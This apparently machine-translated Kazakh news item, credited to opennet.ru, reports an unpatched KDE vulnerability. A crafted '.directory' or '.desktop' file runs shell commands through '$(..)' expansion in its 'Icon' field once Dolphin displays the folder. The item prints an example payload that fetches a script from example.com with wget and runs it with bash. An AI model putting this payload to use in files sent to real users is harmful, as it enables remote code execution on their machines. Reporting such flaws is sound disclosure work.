KDE ішінде , ол пайдаланушы арнайы әзірленген «.desktop» және «.directory» файлдары бар каталогты немесе мұрағатты көргенде, шабуылдаушыға ерікті пәрмендерді орындауға мүмкіндік береді. Шабуыл пайдаланушыдан Dolphin файл менеджеріндегі файлдар тізімін көруді, зиянды жұмыс үстелі файлын жүктеп алуды немесе төте жолды жұмыс үстеліне немесе құжатқа апаруды талап етеді. Мәселе кітапханалардың ағымдағы шығарылымында көрінеді және ескі нұсқалар, KDE 4 дейін. Осалдық әлі де сақталады (CVE тағайындалмаған).
Мәселе KDesktopFile сыныбының дұрыс орындалмауынан туындады, ол «Icon» айнымалысын өңдеу кезінде тиісті қашусыз мәнді KConfigPrivate::expandString() функциясына береді, ол қабықтың арнайы таңбаларын кеңейтуді, соның ішінде өңдеуді орындайды. «$(..)» жолдары орындалатын пәрмендер ретінде . XDG спецификациясының талаптарына қайшы, іске асыру қабық конструкциялары параметрлердің түрін бөлмей шығарылады, яғни. іске қосылатын қолданбаның пәрмен жолын анықтау кезінде ғана емес, әдепкі бойынша көрсетілетін белгішелерді көрсету кезінде де.
Мысалы, шабуыл жасау пайдаланушыға «.directory» файлы бар каталогы бар zip мұрағатын жіберіңіз:
[Жұмыс үстеліндегі жазба] Түр=Каталог
Белгіше[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Мұрағаттың мазмұнын Dolphin файл менеджерінде көруге әрекеттенгенде, https://example.com/FILENAME.sh сценарийі жүктеліп, орындалады.
Ақпарат көзі: opennet.ru